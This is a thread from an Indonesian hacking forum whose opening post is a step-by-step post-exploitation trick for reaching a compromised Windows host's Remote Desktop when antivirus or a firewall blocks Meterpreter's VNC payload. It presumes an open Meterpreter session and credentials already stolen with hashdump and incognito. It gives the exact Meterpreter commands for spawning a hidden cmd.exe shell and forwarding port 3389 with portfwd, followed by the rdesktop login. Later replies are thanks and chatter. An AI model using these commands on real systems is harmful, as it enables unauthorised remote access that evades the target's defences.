Saat vnc payload ngadat ( DENIED )
#1
hmm sedikit trik dari ane ... pernahkah kita menjalankan vnc dari meterpreter dan saat itu di tolak karena adanya antivirus atau perlindungan firewall atau tidak dapat konek rdp karena adanya pembatasan2 pada sistem ? so ini yang dapat anda lakukan

ane anggap anda sudah mendapatkan channel meterpreter ..dan tentu saja telah mendapatkan pass target dengan hashdump dan icognito .. hmmm sudah pernah ane posting di mari klo nda salah Big Grin

Code:
meterpreter > execute -H -c -i -f cmd.exe
Process 116 created.
Channel 1 created.

Setelah memasuki shell , periksa apakah service remote berjalan dengan netstat

Code:
C:\WINDOWS\system32>netstat -na | find "3389"
netstat -na | find "3389"
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING

Okey ternyata memang dalam posisi open ( listening ) so kita tinggal melakukan forward ..

Code:
meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389

ok kita cek apa sudah berada pada daftar local port

Code:
meterpreter > portfwd list
0: 0.0.0.0:3389 -> 127.0.0.1:3389

1 total local port forwards.

ok done.. sekarang tinggal konek pake ip 127.0.0.1 ...

Code:
rdesktop -u target 192.168.2.6:3389

ss gk bisa di upload karena kegedean ....wkwkwkw --

for more information , feel free for sent email to me

[email protected]

DRACOS-LINUX
CORE-DEV



FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
wew makasih om udah di share, punya masalah ginian juga nih Tongue
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#3
mass zee tu meterpreter lagi nyerang windows xp yaaBig GrinBig GrinBig Grin

#4
pernah om , ampe binggung ngatasinnyaAngry
thank's om share nya , jadi ngerti cara pemecahan masalahnya Smile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#5
(09-14-2012, 12:00 PM)dvil Wrote: mass zee tu meterpreter lagi nyerang windows xp yaaBig GrinBig GrinBig Grin

itu ane coba via virtualbox windows xp .. tapi berlaku malah untuk win7 dan win8 yang selalu memblokir akses vnc payload
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#6
wah di pivot ya om? pake portforward di host sndiri....eh beda ding ini klo di host sndiri jd seakan2 target mengira payloadnya dari localhost 127.0.0.1

bener ga om zee?

#7
pernah ngalamin nih ane vnc ngadat, sampe bingung trus ga jadi exploit..

#8
Wih wih, makasih om tutornya. Izin simpan dulu biar gak hilang
Calon manusia sukses tidak akan pernah mengeluh, tapi akan sibuk memperbaiki diri dari semua kesalahan yang pernah dibuatnya
My Facebook
My Twitter

#9
ane ctl D dulu deh , biar kagak ilang , walaupun belum nyoba , ntar iseng2 nyoba Big Grin thank om

#10
Confused:- wah ijin menyimak saja om jii
Every Second, Every Minutes, Every Hours, Every Days Its Never End





Users browsing this thread: 1 Guest(s)